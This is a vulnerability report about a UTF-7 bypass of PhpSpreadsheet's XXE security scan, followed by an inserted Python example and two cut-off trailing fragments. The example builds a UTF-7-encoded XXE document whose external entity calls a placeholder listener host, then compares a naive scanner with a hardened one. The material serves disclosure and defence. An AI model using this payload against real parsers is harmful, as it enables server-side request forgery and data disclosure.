XXE Injection - Security scan bypass #771
What is the expected behavior?
The securityScan() function is used to prevent XXE attacks.
What is the current behavior?
The securityScan() function can be bypassed by using UTF-7 encoding.
What are the steps to reproduce?
(Details suppressed until after the patch was released.)
Replace the IP address and port
Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library.
Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue.
Which versions of PhpSpreadsheet and PHP are affected?
I believe it affects all versions.
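The mechanism behind the report is that a scanner which searches the raw bytes of an XML document for a DOCTYPE declaration never sees the literal string `<!DOCTYPE` when the attacker declares `encoding="UTF-7"` and base64-shifts that part of the document, yet an XML parser that honours the declared encoding decodes it back into a real DOCTYPE with an external entity. The following is an added example, not PhpSpreadsheet's `securityScan()` or any other project code: `naive_security_scan`, `hardened_security_scan`, `sniff_encoding` and `build_utf7_xxe_document` are hypothetical names, the payload and the `entity_url` are constructed locally, and the hardened variant goes slightly beyond the UTF-7 case by also sniffing UTF-16 BOMs and null-byte signatures, which defeat the same kind of byte-level match.

```python
"""Why a byte-level XXE scan is defeated by UTF-7, and one way to harden it.

Added example, not PhpSpreadsheet code. Both scanner functions are hypothetical
stand-ins for a securityScan()-style check; the payload is constructed inline.
"""
import base64
import re

# Byte-level pattern a naive scanner applies to the raw document.
DOCTYPE_BYTES_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# Same pattern, applied to text after decoding.
DOCTYPE_TEXT_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# Encoding attribute of the (ASCII-compatible) XML prolog.
ENCODING_DECL_RE = re.compile(
    rb"^\s*<\?xml[^>]*encoding=[\"']([A-Za-z0-9._-]+)[\"']", re.IGNORECASE
)


def utf7_shift(text: str) -> str:
    """Encode *text* as one UTF-7 base64 shift sequence ('+...-').

    UTF-7 allows any character, including ASCII punctuation such as '<' and
    '!', to be carried as base64 of its UTF-16BE form. The raw bytes then no
    longer contain '<!DOCTYPE', but a UTF-7 decoder restores it exactly.
    """
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii").rstrip("=")
    return "+" + b64 + "-"


def build_utf7_xxe_document(entity_url: str) -> bytes:
    """Constructed sample: plain-ASCII prolog (valid UTF-7) declaring UTF-7,
    followed by a base64-shifted DOCTYPE with an external entity."""
    doctype = f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{entity_url}">]>'
    xml = '<?xml version="1.0" encoding="UTF-7"?>' + utf7_shift(doctype) + "<r>&xxe;</r>"
    return xml.encode("ascii")


def naive_security_scan(xml: bytes) -> bool:
    """Hypothetical byte-level check. True means 'DOCTYPE found, reject'."""
    return DOCTYPE_BYTES_RE.search(xml) is not None


def sniff_encoding(xml: bytes) -> str:
    """Approximate the encoding an XML parser would pick: BOM first, then the
    UTF-16 null-byte signatures of '<?', then the prolog attribute, else UTF-8."""
    if xml.startswith((b"\xff\xfe", b"\xfe\xff")):
        return "utf-16"  # the codec consumes the BOM itself
    if xml.startswith(b"<\x00?\x00"):
        return "utf-16-le"
    if xml.startswith(b"\x00<\x00?"):
        return "utf-16-be"
    m = ENCODING_DECL_RE.match(xml)
    return m.group(1).decode("ascii") if m else "utf-8"


def hardened_security_scan(xml: bytes) -> bool:
    """Decode the way the parser will *before* pattern matching.

    Anything that cannot be decoded (unknown codec, malformed bytes) is
    rejected rather than scanned blind. True means 'reject'.
    """
    try:
        text = xml.decode(sniff_encoding(xml))
    except (LookupError, UnicodeDecodeError):
        return True
    return DOCTYPE_TEXT_RE.search(text) is not None


if __name__ == "__main__":
    # Placeholder host/port for the listener described in the report.
    doc = build_utf7_xxe_document("http://198.51.100.7:8080/x")
    print(doc)
    print("naive scan rejects:   ", naive_security_scan(doc))
    print("hardened scan rejects:", hardened_security_scan(doc))
    print("decoded:", doc.decode("utf-7"))
```

Running the block prints the raw bytes (no `<!DOCTYPE` anywhere in them), shows the naive scan accepting the document and the hardened one rejecting it, and finally prints the decoded text containing the full DOCTYPE and `SYSTEM` entity. The design point is that any deny-list check must run on the same representation the parser consumes; the more robust fix is to disable external entity loading in the parser altogether and keep the pattern check only as defence in depth.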
Would it be possible for the
Looking more closely